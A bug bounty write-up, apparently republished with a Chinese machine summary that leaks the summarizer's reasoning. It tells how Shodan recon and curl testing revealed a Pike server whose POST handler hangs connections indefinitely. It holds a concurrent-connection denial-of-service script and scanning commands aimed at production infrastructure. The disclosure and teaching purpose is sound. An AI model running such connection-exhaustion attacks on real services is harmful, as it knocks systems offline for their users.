Found a Denial of Service Vulnerability in a Major Company’s Production Infrastructure Using Shodan
嗯,用户让我帮忙总结一篇文章的内容,控制在一百个字以内,而且不需要特定的开头。首先,我需要理解这篇文章讲的是什么。看起来是关于赏金猎人发现一个漏洞的过程。 文章开始提到使用Shodan进行侦察,搜索IP范围,发现了一个运行Pike HTTP服务器的主机。然后详细描述了测试不同端口的过程,特别是8888端口在处理POST请求时出现异常,导致连接无限挂起,从而引发拒绝服务漏洞。 接下来,作者通过发送多个POST请求证明了漏洞的影响,并提供了详细的证据和分类。最后总结了一些bug hunting的经验和教训。 所以,总结的时候需要涵盖侦察、发现异常端口、测试方法、漏洞影响以及分类这几个关键点。控制在一百字以内的话,要简洁明了。 可能的结构是:赏金猎人通过Shodan发现异常服务器,测试后发现处理POST请求导致连接挂起,形成DoS漏洞,并详细记录和分类。 检查一下是否遗漏了关键信息:使用Shodan搜索IP范围、Pike服务器、端口8888的异常行为、多连接测试证明影响、CVSS评分等。这些都需要包含进去。 最后确保语言流畅,没有语法错误,并且符合用户的要求。 </think> 赏金猎人通过Shodan搜索发现某大型科技公司IP范围内的一台异常Pike HTTP服务器。测试其开放端口时,发现Port 8888处理POST请求时出现异常行为——服务器接收数据后未响应且保持连接状态。进一步验证显示该行为会导致资源耗尽,最终确认为Denial of Service漏洞并成功报告。 2026-3-22 05:14:10 Author: infosecwriteups.com(查看原文) 阅读量:10 收藏

Hacker MD

A step-by-step story of reconnaissance, discovery, and responsible disclosure

Press enter or click to view image in full size

Bug bounty hunting is rarely glamorous. Most of the time, it’s hours of staring at HTTP responses, chasing dead ends, and questioning whether that “weird behavior” is actually a vulnerability or just… intended. This is the story of one of those hunts — where a simple Shodan search led me down a rabbit hole that ended with a legitimate Denial of Service vulnerability on production infrastructure serving millions of users.

The Hunt Begins: Shodan Reconnaissance

Every good bug hunt starts with reconnaissance. My target was a large tech company with a public bug bounty program that included IP ranges in their scope. This is often an overlooked attack surface — most researchers focus on web applications and APIs, ignoring raw IP ranges entirely.

I fired up Shodan and searched their IP range:

net:185.26.x.x/22

Most results were boring — a few nginx servers returning 301 redirects, some DNS servers. Standard stuff. But one IP caught my eye immediately.

The Interesting Host

One particular host stood out from the rest. While other servers in the range were running standard nginx, this one was running something completely different:

Server: Pike v8.0 release 908: HTTP Server module

Pike HTTP Server. Not something you see every day.

More interesting was the port list:

Open Ports: 22, 80, 123, 1080, 2049, 2345, 8081, 8192, 8888, 8889, 9000

Eleven open ports on a production server. Each one a potential story.

My eyes immediately went to three unusual ports:

  • Port 2049 — traditionally NFS (Network File System)
  • Port 1080 — traditionally SOCKS proxy
  • Port 2345 — traditionally DBM (Database Manager)
  • Ports 8888/8889 — unknown Pike services

This was not a standard web server. This was infrastructure.

Peeling Back the Layers

NFS on Port 2049?

My first instinct was to enumerate the NFS service:

showmount -e [TARGET_IP]
# Result: clnt_create: RPC: Unable to receive

Interesting. The port was open but RPC wasn’t responding. I ran a more detailed nmap scan:

nmap -sV -p 111,2049 --script=rpcinfo [TARGET_IP]

The result was surprising. Port 2049 wasn’t NFS at all. It was responding with something completely custom:

_version\xa0\xe8\xa3\x06\x15cmbt9x79skf8qsbx8hr8q25xg

A custom binary protocol, disguised on the NFS port. Every request returned a different random session identifier. This was Opera’s internal proprietary protocol hiding in plain sight on a well-known port — security through obscurity.

Port 1080: Closed SOCKS

curl --socks5 [TARGET_IP]:1080 http://example.com
# Result: curl: (97) connection to proxy closed

Not an open proxy. Connection immediately refused. Moving on.

Port 8888: Where Things Got Interesting

This is where the real story begins.

A simple GET request to port 8888:

curl http://[TARGET_IP]:8888/

Response:

HTTP/1.1 400 Bad Request
Server: Pike v8.0 release 908: HTTP Server module
Don't know how to handle request in ext.

Immediately interesting. “ext” — an internal Pike module. The server is telling me it has an extension module but doesn’t know how to handle my request. What happens with other HTTP methods?

curl -X PUT http://[TARGET_IP]:8888/
# Response: "Unhandled method in ext"
curl -X DELETE http://[TARGET_IP]:8888/
# Response: "Unhandled method in ext"

Different error messages for different methods. The server is clearly processing requests through an “ext” module handler. But what about POST?

curl -X POST -d "test" http://[TARGET_IP]:8888/

I stared at my terminal.

Nothing happened.

The cursor just… blinked.

The Vulnerability Reveals Itself

I waited. Five seconds. Ten seconds. Thirty seconds. A minute.

No response.

In my experience, this behavior — connection established, data sent, server silent — is almost always significant. Normal servers always respond, even if it’s just an error code. Silence is not normal.

I opened a second terminal and ran netstat monitoring:

watch -n 2 "netstat -tn | grep [TARGET_IP]:8888"

Then sent the POST request again. The netstat output showed:

tcp    0    0  MY_IP:44334    TARGET_IP:8888    ESTABLISHED

The connection was in ESTABLISHED state. The server had accepted my connection, received my data, and… stopped. No response. No timeout. Just open, consuming resources, indefinitely.

I set a 300-second timeout to measure exactly how long the server would hold the connection:

timeout 300 curl -X POST -d "test" http://[TARGET_IP]:8888/
echo $?

After exactly 300 seconds, my terminal returned:

124

Exit code 124. The timeout command killed the process because the server never responded in 300 seconds.

This was not normal behavior. This was a vulnerability.

Understanding the Bug

Let me explain what was actually happening technically.

When you send an HTTP POST request to a normal server, the following happens:

Client → Server: TCP SYN
Server → Client: TCP SYN-ACK
Client → Server: TCP ACK (handshake complete)
Client → Server: HTTP POST data
Server → Client: HTTP Response (200, 400, 500, anything)
Connection closes.

On this server:

Client → Server: TCP SYN ✅
Server → Client: TCP SYN-ACK ✅
Client → Server: TCP ACK ✅ (handshake complete)
Client → Server: HTTP POST data ✅ (acknowledged by server)
Server → Client: ??? ❌ (NEVER SENT)
Connection stays OPEN indefinitely ❌

The Pike HTTP Server’s “ext” module was accepting POST requests, receiving the data, but then hanging in processing — never sending any HTTP response back. The connection stayed open, consuming a worker thread and memory, for as long as the client maintained it.

Critically: there was no timeout enforcement. The server had no mechanism to detect or kill hung connections.

Proving the Impact

Finding weird behavior is one thing. Proving exploitable impact is another. Bug bounty programs want to see: “As an attacker, what could I do?”

I needed to demonstrate that this wasn’t just an anomaly — it was a weaponizable vulnerability.

The Multi-Connection Test

I opened two terminal windows side by side and recorded everything:

Get Hacker MD’s stories in your inbox

Join Medium for free to get updates from this writer.

Remember me for faster sign in

Terminal 1 — Attack simulation:

for i in {1..5}; do 
echo "Starting connection $i at $(date +%T)"
timeout 60 curl -X POST -d "test$i" http://[TARGET_IP]:8888/ &
done

Terminal 2 — Real-time monitoring:

watch -n 1 "netstat -tn | grep [TARGET_IP]:8888"

The netstat output updated in real-time:

tcp    0    0  MY_IP:41740    TARGET_IP:8888    ESTABLISHED
tcp 0 0 MY_IP:41752 TARGET_IP:8888 ESTABLISHED
tcp 0 0 MY_IP:41762 TARGET_IP:8888 ESTABLISHED
tcp 0 0 MY_IP:41774 TARGET_IP:8888 ESTABLISHED
tcp 0 0 MY_IP:41782 TARGET_IP:8888 ESTABLISHED

Five simultaneous connections. All ESTABLISHED. All hanging. All consuming server resources.

Each connection was holding a worker thread hostage for 60 seconds. Scale this to 50 or 100 connections and you have complete service exhaustion — no legitimate user can get a response because all server workers are occupied with hung POST requests.

The Evidence Package

My complete evidence:

  1. Screenshot 1: Single POST request hanging — netstat showing ESTABLISHED, curl showing data sent but no response
  2. Screenshot 2: Exit code 124 after 300 seconds, connection transitioning to FIN_WAIT2 (server never properly closed the connection)
  3. Screenshot 3: Five simultaneous hung connections, all ESTABLISHED, all consuming resources

Vulnerability Classification

According to Bugcrowd VRT (Vulnerability Rating Taxonomy) v1.17:

  • Category: Application-Level Denial-of-Service (DoS)
  • Subcategory: Critical Impact and/or Easy Difficulty
  • Baseline Priority: P2 (High)

CVSS 3.1 Score: 7.5 (HIGH)

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Breaking this down:

  • AV:N — Network accessible, no physical access needed
  • AC:L — Low complexity, simple curl command
  • PR:N — No privileges required, public endpoint
  • UI:N — No user interaction needed
  • A:H — High availability impact

Writing the Report

A bug bounty report lives or dies by how clearly it answers one question:

“As an attacker, what could I do?”

My answer:

“I can render this proxy service unavailable by sending concurrent POST requests that hang indefinitely. Each request consumes a worker thread for 300+ seconds with zero timeout enforcement. With just 10–20 connections from a single machine, all server workers become exhausted, preventing legitimate users from accessing the service entirely. The attack requires no authentication, no special tools, and can be sustained for hours.”

I structured the report with:

  • Clear vulnerability description
  • Technical root cause (Pike’s ext module missing timeout enforcement)
  • Step-by-step reproduction
  • Evidence screenshots embedded directly
  • CVSS score with justification
  • VRT classification with reasoning
  • Remediation recommendations

The Triage Response

After submitting, I received a response from the triage team that initially caused confusion. They wrote:

“Without running the provided command, we are getting same result. Can you please double check whether you are actually able to perform DOS on mentioned host or not?”

They had tested the endpoint — but with a GET request, not a POST request. GET requests respond immediately with an error message. That’s expected and normal.

This is a common triage misunderstanding. The vulnerability is method-specific — GET works fine, POST hangs forever.

I responded with a clear side-by-side comparison:

GET Request (Normal behavior):

curl http://[TARGET_IP]:8888/
# Immediate response: "Don't know how to handle request in ext."
# Response time: < 1 second ✅

POST Request (Vulnerable behavior):

timeout 300 curl -X POST -d "test" http://[TARGET_IP]:8888/
echo $?
# No response for 300 seconds
# Exit code: 124 (timeout forced termination) ❌

The key lesson: always explicitly clarify which HTTP method, parameter, or condition triggers the vulnerability. Triage teams test quickly and may not try every variation.

Key Takeaways for Bug Hunters

1. Don’t Ignore IP Ranges in Scope

Most researchers focus exclusively on web domains. IP ranges are often where the interesting internal infrastructure lives — proxy servers, internal APIs, management interfaces. Shodan is your best friend here.

2. Unusual Servers = Unusual Vulnerabilities

When you see a non-standard server (Pike, Roxen, Resin, anything that isn’t nginx/Apache/IIS), treat it with extra scrutiny. Less common software often has less hardening, less community scrutiny, and more unexpected behavior.

3. Test All HTTP Methods Separately

GET, POST, PUT, DELETE, PATCH, OPTIONS, HEAD — they can all behave differently. A server that handles GET correctly might completely fail on POST. Always test each method explicitly.

4. Silence is a Signal

If a server accepts your connection, receives your data, and then says nothing — that’s not “no vulnerability found.” That’s a behavior worth investigating deeply. Normal servers always respond, even with errors.

5. Measure Everything

Exit codes, response times, connection states — quantify your findings. “The server hangs” is weak. “The server holds connections open for 300+ seconds (exit code 124), while 5 concurrent connections remain in ESTABLISHED state simultaneously” is strong, documented evidence.

6. netstat is Your Best Friend for DoS PoC

Real-time connection monitoring with watch -n 1 "netstat -tn | grep TARGET" gives you indisputable visual proof of resource exhaustion. Screenshot it. Record it.

7. Clarify Method-Specific Bugs in Reports

Always explicitly state: “This vulnerability is triggered by POST requests specifically. GET requests behave normally.” Triage teams move fast and may test the wrong method.

Technical Summary

Press enter or click to view image in full size

Final Thoughts

This find reinforced something I believe deeply about bug hunting: the most interesting vulnerabilities are often hiding in plain sight, on ports and services that everyone else scrolls past.

A weird server on an unusual port. A POST request that didn’t respond. A blinking cursor that turned into a legitimate P2 vulnerability.

The technical skill here wasn’t complex. What mattered was:

  • Thorough reconnaissance
  • Curiosity about unusual behavior
  • Methodical documentation
  • Clear, honest impact assessment

If you’re new to bug bounty hunting, start with reconnaissance. Learn Shodan. Read program scopes carefully, including IP ranges. And when something behaves unexpectedly don’t dismiss it. Investigate it.

That blinking cursor might just be your next bounty. 🎯

Happy hunting. Stay curious. Report responsibly.

Tags: #BugBounty #CyberSecurity #PenTesting #EthicalHacking #DoS #Shodan #WebSecurity #InfoSec #BugBountyTips #Reconnaissance

Press enter or click to view image in full size

Press enter or click to view image in full size


文章来源: https://infosecwriteups.com/found-a-denial-of-service-vulnerability-in-a-major-companys-production-infrastructure-using-shodan-e5f766a4df79?source=rss----7b722bfd1b8d--bug_bounty
如有侵权请联系:admin#unsafe.sh